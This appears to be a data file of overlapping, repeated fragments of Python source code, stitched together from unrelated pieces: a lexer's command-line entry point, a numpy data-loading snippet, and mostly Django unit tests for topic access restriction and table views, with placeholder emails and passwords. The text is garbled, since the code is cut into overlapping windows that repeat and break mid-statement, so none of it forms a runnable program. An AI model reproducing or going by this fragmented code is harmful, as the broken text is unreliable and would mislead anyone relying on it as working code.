np.asarray(x_test) ytest = np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape)" ]
[ "f: while True: c = f.read(1) if not c: break", "lexer import * import sys if len(sys.argv) != 2: print(\"usage:", "2: print(\"usage: main.py file\") else: lex = Lexer(sys.argv[1]) with open(sys.argv[1])", "open(sys.argv[1]) as f: while True: c = f.read(1) if not", "from lexer import * import sys if len(sys.argv) != 2:", "* import sys if len(sys.argv) != 2: print(\"usage: main.py file\")", "else: lex = Lexer(sys.argv[1]) with open(sys.argv[1]) as f: while True:", "as f: while True: c = f.read(1) if not c:", "!= 2: print(\"usage: main.py file\") else: lex = Lexer(sys.argv[1]) with", "with open(sys.argv[1]) as f: while True: c = f.read(1) if", "<filename>CompilerPython/LexerPython/main.py from lexer import * import sys if len(sys.argv) !=", "lex = Lexer(sys.argv[1]) with open(sys.argv[1]) as f: while True: c", "main.py file\") else: lex = Lexer(sys.argv[1]) with open(sys.argv[1]) as f:", "if len(sys.argv) != 2: print(\"usage: main.py file\") else: lex =", "Lexer(sys.argv[1]) with open(sys.argv[1]) as f: while True: c = f.read(1)", "file\") else: lex = Lexer(sys.argv[1]) with open(sys.argv[1]) as f: while", "= Lexer(sys.argv[1]) with open(sys.argv[1]) as f: while True: c =", "import sys if len(sys.argv) != 2: print(\"usage: main.py file\") else:", "print(\"usage: main.py file\") else: lex = Lexer(sys.argv[1]) with open(sys.argv[1]) as", "import * import sys if len(sys.argv) != 2: print(\"usage: main.py", "while True: c = f.read(1) if not c: break print(lex.scan().toString())", "len(sys.argv) != 2: print(\"usage: main.py file\") else: lex = Lexer(sys.argv[1])", "sys if len(sys.argv) != 2: print(\"usage: main.py file\") else: lex" ]
[ "= self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) #", "get_topic(request, self.dep.id, outsider_topic.id) flag = False except Http404: flag =", "test request = self.client.post(url, data=data) # Assert test self.assertEqual(302, request.status_code)", "django.urls import reverse from django.test import TestCase, RequestFactory from django.http", "= reverse('web_user_table') another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\",", "self.topic.id) # Assert test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): # Setup", "self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic name',", "self.topic.id})) request.user = self.user # Exercise test another_dep = Department.objects.create()", "test_return_topic_that_match_user(self): # Setup test request = RequestFactory() request = request.get(reverse('get_topic',", "dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test", "setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac", "test_return_topic_that_outside_user_topics(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test test test\",", "UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac,", "faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request, self.dep.id, outsider_topic.id) flag", "faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): #", "self.dep.id, 'topic_id': self.topic.id})) request.user = self.user # Exercise test another_dep", "password='<PASSWORD>' ) url = reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") #", "get_topic(request, another_dep.id, self.topic.id) flag = False except Http404: flag =", "self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): # Setup test url", "= Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self): #", "Department.objects.create() try: response = get_topic(request, another_dep.id, self.topic.id) flag = False", "email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile =", "request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): # Setup test url =", "Exercise test request = self.client.post(url) # Assert test self.assertEqual(302, request.status_code)", "faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory() request = request.get(reverse('get_topic',", "Assert test self.assertEqual(200, 
request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): # Setup", "from cms.views import get_topic class AccessRestriction(TestCase): def setUp(self): self.user =", "test another_topic = Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep)", "Setup test user = User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url", "import TestCase, RequestFactory from django.http import HttpRequest, Http404 from django.contrib.auth.models", "resolve from django.urls import reverse from django.test import TestCase, RequestFactory", "def setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university')", "# Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup test another_topic", "= self.client.get(url) # Assert test self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def", "test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup test", "= Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic name', desc='ddddd',", "= Department.objects.create() try: response = get_topic(request, another_dep.id, self.topic.id) flag =", "User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url = reverse('web_dep_table') request =", "from unittest import skip from users.models import University, Faculty, Department,", "another_dep.id, self.topic.id) flag = False except Http404: flag = True", "self.client.post(url) # Assert test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): # Setup", "self.dep.id, 'topic_id': self.topic.id})) request.user = self.user # Exercise test response", "= Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic =", "response = get_topic(request) flag = False except Http404: flag =", "desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request)", "desc=\"test test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory()", "= self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) #", "= User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test", "= self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def", "True # Assert test self.assertTrue(flag) class TableViews(TestCase): def setUp(self): self.user", "department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep) def", "another_dep = Department.objects.create() try: response = get_topic(request, another_dep.id, self.topic.id) flag", "request = self.client.get(url) # Assert test self.assertEqual(200, 
request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html')", "password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)", "test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): # Setup test request =", "username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url = reverse('web_dep_table') request = self.client.login(username=\"test_username\",", "User from unittest import skip from users.models import University, Faculty,", "User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile", "except Http404: flag = True # Assert test self.assertTrue(flag) class", "self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): # Setup test url", "self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac =", "self.topic.id) flag = False except Http404: flag = True #", "test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request, self.dep.id,", "get_topic(request, self.dep.id, self.topic.id) # Assert test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self):", "password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) # Assert test", "self.dep.id, outsider_topic.id) flag = False except Http404: flag = True", "self.user # Exercise test outsider_topic = Topic.objects.create(name='ms', desc=\"test test test\",", "self.dep.id, self.topic.id) # Assert test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): #", "request = self.client.get(url) # Assert test self.assertEqual(302, request.status_code) class UserTableViews(TestCase):", "user = User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url = reverse('web_dep_table')", "RequestFactory from django.http import HttpRequest, Http404 from django.contrib.auth.models import User", "= User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise", "True # Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup test", "University, Faculty, Department, UserProfile from cms.models import Topic from cms.views", "self.user # Exercise test try: response = get_topic(request, self.dep.id, 990)", "test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): # Setup test", "# Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): #", "response = get_topic(request, self.dep.id, outsider_topic.id) flag = False except Http404:", "True # Assert test self.assertTrue(flag) def test_get_topic_with_no_parameters(self): # Setup test", "request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url)", "test_return_topic_that_does_not_exist(self): # Setup test request = 
RequestFactory() request = request.get(reverse('get_topic',", "Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): # Setup", "Setup test request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id,", "test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request) flag", "self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test", "'topic_id': self.topic.id})) request.user = self.user # Exercise test response =", "{} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request =", "faculty=self.fac) def test_page_load_on_get(self): # Setup test url = reverse('web_dep_table') request", "django.http import HttpRequest, Http404 from django.contrib.auth.models import User from unittest", "class UserTableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac", "= get_topic(request) flag = False except Http404: flag = True", "self.uni = University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test", "User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test", "# Exercise test request = self.client.get(url) # Assert test self.assertEqual(302,", "= Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup", "Exercise test outsider_topic = Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac, term=1)", "False except Http404: flag = True # Assert test self.assertTrue(flag)", "TestCase, RequestFactory from django.http import HttpRequest, Http404 from django.contrib.auth.models import", "self.dep.id, 'topic_id': self.topic.id})) request.user = self.user # Exercise test try:", "= get_topic(request, another_dep.id, self.topic.id) flag = False except Http404: flag", "reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test request =", "def test_page_load_on_get(self): # Setup test url = reverse('web_dep_table') request =", "# Exercise test response = get_topic(request, self.dep.id, self.topic.id) # Assert", "request.user = self.user # Exercise test response = get_topic(request, self.dep.id,", "= True # Assert test self.assertTrue(flag) def test_get_topic_with_no_parameters(self): # Setup", "self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup test url", "name', desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup test url", "Assert test self.assertTrue(flag) def test_get_topic_with_no_parameters(self): # Setup test another_topic =", "test_get_topic_with_no_parameters(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test test test\",", "# Exercise test request = self.client.get(url) # Assert test self.assertEqual(200,", "test user = User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url =", "test test\", faculty=self.fac, term=1) 
self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic) def", "import Topic from cms.views import get_topic class AccessRestriction(TestCase): def setUp(self):", "<reponame>Ibrahem3amer/bala7<filename>cms/tests/test_views.py from django.core.urlresolvers import resolve from django.urls import reverse from", "self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) # Assert", "self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self): # Setup test", "Setup test url = reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") #", "url = reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test", ") url = reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise", "= University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test dep')", "response = get_topic(request, self.dep.id, 990) flag = False except Http404:", "= User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>' ) url = reverse('web_dep_table') request", "Assert test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): # Setup test request", "self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup test request = RequestFactory()", "term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request) flag = False except", "= self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.post(url) #", "unittest import skip from users.models import University, Faculty, Department, UserProfile", "def test_page_redirect_on_no_profile(self): # Setup test user = User.objects.create_user( username='test_username', email='<EMAIL>',", "# Setup test url = reverse('web_user_table') another_user = User.objects.create_user(username='xxxss', email='<EMAIL>',", "= self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) #", "test response = get_topic(request, self.dep.id, self.topic.id) # Assert test self.assertEqual(200,", "'tables/table_main.html') def test_page_redirect_on_post(self): # Setup test url = reverse('web_dep_table') request", "'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup test url = reverse('web_user_table') another_user", "'topic_id': self.topic.id})) request.user = self.user # Exercise test try: response", "import get_topic class AccessRestriction(TestCase): def setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>',", "Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup", "# Exercise test request = self.client.post(url, data=data) # Assert test", "request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): # Setup test url =", "= False except Http404: flag = True # Assert test", "Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup test request =", "flag = True # Assert test self.assertTrue(flag) def 
test_get_topic_with_no_parameters(self): #", "Setup test another_topic = Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac, term=1)", "flag = True # Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): #", "self.assertTrue(flag) class TableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>')", "User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni = University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty')", "term=1) self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self): # Setup", "outsider_topic = Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try:", "test another_dep = Department.objects.create() try: response = get_topic(request, another_dep.id, self.topic.id)", "test_post_when_no_choices(self): # Setup test url = reverse('web_user_table') data = {}", "try: response = get_topic(request, another_dep.id, self.topic.id) flag = False except", "try: response = get_topic(request, self.dep.id, outsider_topic.id) flag = False except", "University.objects.create(name='test_university') self.fac = Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test dep') self.profile", "users.models import University, Faculty, Department, UserProfile from cms.models import Topic", "test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request = RequestFactory() request", "Topic from cms.views import get_topic class AccessRestriction(TestCase): def setUp(self): self.user", "test_page_load_on_get(self): # Setup test url = reverse('web_dep_table') request = self.client.login(username=\"ssss\",", "self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) # Assert", "self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep =", "self.dep = Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic", "= UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test test test\",", "from django.contrib.auth.models import User from unittest import skip from users.models", "self.dep.id, 990) flag = False except Http404: flag = True", "= RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id})) request.user", "test\", faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic) def test_return_topic_that_match_user(self):", "email='<EMAIL>', password='<PASSWORD>') self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep,", "= Faculty.objects.create(name='Test faculty') self.dep = Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni,", "get_topic(request) flag = False except Http404: flag = True #", "= self.client.login(username=\"xxxss\", 
password=\"<PASSWORD>\") # Exercise test request = self.client.post(url, data=data)", "= self.user # Exercise test another_dep = Department.objects.create() try: response", "password=\"<PASSWORD>\") # Exercise test request = self.client.post(url, data=data) # Assert", "= reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request", "desc=\"test test test\", faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile = self.profile self.profile.topics.add(self.topic)", "self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url) # Assert", "= reverse('web_dep_table') request = self.client.login(username=\"test_username\", password=\"<PASSWORD>\") # Exercise test request", "Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response =", "test url = reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise", "self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self): # Setup test url = reverse('web_user_table')", "test_return_topic_that_has_different_department(self): # Setup test request = RequestFactory() request = request.get(reverse('get_topic',", "= True # Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup", "self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup test request = RequestFactory() request", "reverse('web_dep_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request =", "url = reverse('web_user_table') another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request =", "faculty=self.fac) self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self):", "email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request", "test_page_load_if_no_profile(self): # Setup test url = reverse('web_user_table') another_user = User.objects.create_user(username='xxxss',", "= Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)", "Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile = self.profile", "Assert test self.assertTrue(flag) class TableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss',", "self.user.profile.topics.add(another_topic) request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id':", "self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup test url = reverse('web_user_table') request", "test try: response = get_topic(request, self.dep.id, 990) flag = False", "test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): # Setup test user =", "= self.user # Exercise test outsider_topic = Topic.objects.create(name='ms', desc=\"test test", "desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request,", "request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 
'topic_id': self.topic.id})) request.user = self.user", "# Exercise test request = self.client.post(url) # Assert test self.assertEqual(302,", "test url = reverse('web_user_table') another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request", "import reverse from django.test import TestCase, RequestFactory from django.http import", "test request = self.client.post(url) # Assert test self.assertEqual(302, request.status_code) def", "Exercise test request = self.client.post(url, data=data) # Assert test self.assertEqual(302,", "Exercise test another_dep = Department.objects.create() try: response = get_topic(request, another_dep.id,", "self.topic.id})) request.user = self.user # Exercise test try: response =", "Faculty, Department, UserProfile from cms.models import Topic from cms.views import", "from django.urls import reverse from django.test import TestCase, RequestFactory from", "= True # Assert test self.assertTrue(flag) class TableViews(TestCase): def setUp(self):", "test url = reverse('web_user_table') data = {} request = self.client.login(username=\"xxxss\",", "= {} request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\") # Exercise test request", "from django.test import TestCase, RequestFactory from django.http import HttpRequest, Http404", "self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs', desc=\"test test", "def test_page_load_on_get(self): # Setup test url = reverse('web_user_table') request =", "# Setup test url = reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\")", "request.user = self.user # Exercise test outsider_topic = Topic.objects.create(name='ms', desc=\"test", "test self.assertTrue(flag) class TableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>',", "request = self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html')", "Http404 from django.contrib.auth.models import User from unittest import skip from", "# Assert test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): # Setup test", "test url = reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise", "= Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic =", "= get_topic(request, self.dep.id, outsider_topic.id) flag = False except Http404: flag", "test_page_load_on_get(self): # Setup test url = reverse('web_user_table') request = self.client.login(username=\"ssss\",", "= Topic.objects.create(name='is', desc=\"test test test\", faculty=self.fac, term=1) another_topic.department.add(self.dep) self.user.profile.topics.add(another_topic) request", "request.user = self.user # Exercise test another_dep = Department.objects.create() try:", "request = self.client.post(url) # Assert test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self):", "cms.views import get_topic class AccessRestriction(TestCase): def setUp(self): self.user = User.objects.create(username='test_username',", "flag = True # Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self): #", "Setup test url = reverse('web_user_table') another_user = 
User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>')", "reverse('web_user_table') another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>') request = self.client.login(username=\"xxxss\", password=\"<PASSWORD>\")", "response = get_topic(request, another_dep.id, self.topic.id) flag = False except Http404:", "def test_get_topic_with_no_parameters(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test test", "Http404: flag = True # Assert test self.assertTrue(flag) def test_return_topic_that_outside_user_topics(self):", "self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self):", "UserTableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>') self.fac =", "Department.objects.create(name='Test dep') self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep) self.topic = Topic.objects.create(name='cs',", "flag = False except Http404: flag = True # Assert", "test_page_redirect_on_no_profile(self): # Setup test user = User.objects.create_user( username='test_username', email='<EMAIL>', password='<PASSWORD>'", "self.dep = Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self):", "# Setup test url = reverse('web_user_table') data = {} request", "test self.assertTrue(flag) def test_get_topic_with_no_parameters(self): # Setup test another_topic = Topic.objects.create(name='is',", "request.user = self.user # Exercise test try: response = get_topic(request,", "AccessRestriction(TestCase): def setUp(self): self.user = User.objects.create(username='test_username', email='<EMAIL>', password='<PASSWORD>') self.uni =", "self.dep.id, 'topic_id': self.topic.id})) request.user = self.user # Exercise test outsider_topic", "import resolve from django.urls import reverse from django.test import TestCase,", "= get_topic(request, self.dep.id, 990) flag = False except Http404: flag", "desc='ddddd', term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup test url =", "# Assert test self.assertEqual(200, response.status_code) def test_return_topic_that_has_different_department(self): # Setup test", "test self.assertEqual(302, request.status_code) class UserTableViews(TestCase): def setUp(self): self.user = User.objects.create_user(username='ssss',", "import skip from users.models import University, Faculty, Department, UserProfile from", "flag = True # Assert test self.assertTrue(flag) class TableViews(TestCase): def", "request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.get(url)", "test request = RequestFactory() request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id':", "True # Assert test self.assertTrue(flag) def test_return_topic_that_does_not_exist(self): # Setup test", "from cms.models import Topic from cms.views import get_topic class AccessRestriction(TestCase):", "def test_page_redirect_on_post(self): # Setup test url = reverse('web_dep_table') request =", "term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request, self.dep.id, outsider_topic.id) flag =", "password='<PASSWORD>') request = self.client.login(username=\"xxxss\", 
password=\"<PASSWORD>\") # Exercise test request =", "# Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_page_load_if_no_profile(self): #", "'tables/user_table.html') def test_post_when_no_choices(self): # Setup test url = reverse('web_user_table') data", "Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def", "self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) self.profile = UserProfile.objects.create(user=self.user, department=self.dep,", "UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) def test_page_load_on_get(self): # Setup test url =", "# Assert test self.assertTrue(flag) class TableViews(TestCase): def setUp(self): self.user =", "self.fac = Faculty.objects.create() self.dep = Department.objects.create(faculty=self.fac) UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic", "test outsider_topic = Topic.objects.create(name='ms', desc=\"test test test\", faculty=self.fac, term=1) outsider_topic.department.add(self.dep)", "request.status_code) def test_page_redirect_on_no_profile(self): # Setup test user = User.objects.create_user( username='test_username',", "self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request = self.client.post(url) # Assert", "faculty=self.fac, term=1) outsider_topic.department.add(self.dep) try: response = get_topic(request) flag = False", "request.status_code) self.assertTemplateUsed(request, 'tables/table_main.html') def test_page_redirect_on_post(self): # Setup test url =", "Department, UserProfile from cms.models import Topic from cms.views import get_topic", "# Assert test self.assertTrue(flag) def test_get_topic_with_no_parameters(self): # Setup test another_topic", "reverse('web_user_table') request = self.client.login(username=\"ssss\", password=\"<PASSWORD>\") # Exercise test request =", "= Topic.objects.create(name='cs', desc=\"test test test\", faculty=self.fac, term=1) self.topic.department.add(self.dep) self.user.profile =", "HttpRequest, Http404 from django.contrib.auth.models import User from unittest import skip", "# Exercise test another_dep = Department.objects.create() try: response = get_topic(request,", "= self.client.post(url) # Assert test self.assertEqual(302, request.status_code) def test_page_redirect_on_no_profile(self): #", "import HttpRequest, Http404 from django.contrib.auth.models import User from unittest import", "django.core.urlresolvers import resolve from django.urls import reverse from django.test import", "term=1) self.topic.department.add(self.dep) def test_page_load_on_get(self): # Setup test url = reverse('web_user_table')", "def test_return_topic_that_outside_user_topics(self): # Setup test another_topic = Topic.objects.create(name='is', desc=\"test test", "outsider_topic.department.add(self.dep) try: response = get_topic(request, self.dep.id, outsider_topic.id) flag = False", "UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac) self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1) self.topic.department.add(self.dep)", "self.client.get(url) # Assert test self.assertEqual(200, request.status_code) self.assertTemplateUsed(request, 'tables/user_table.html') def test_post_when_no_choices(self):", "self.assertTrue(flag) def 
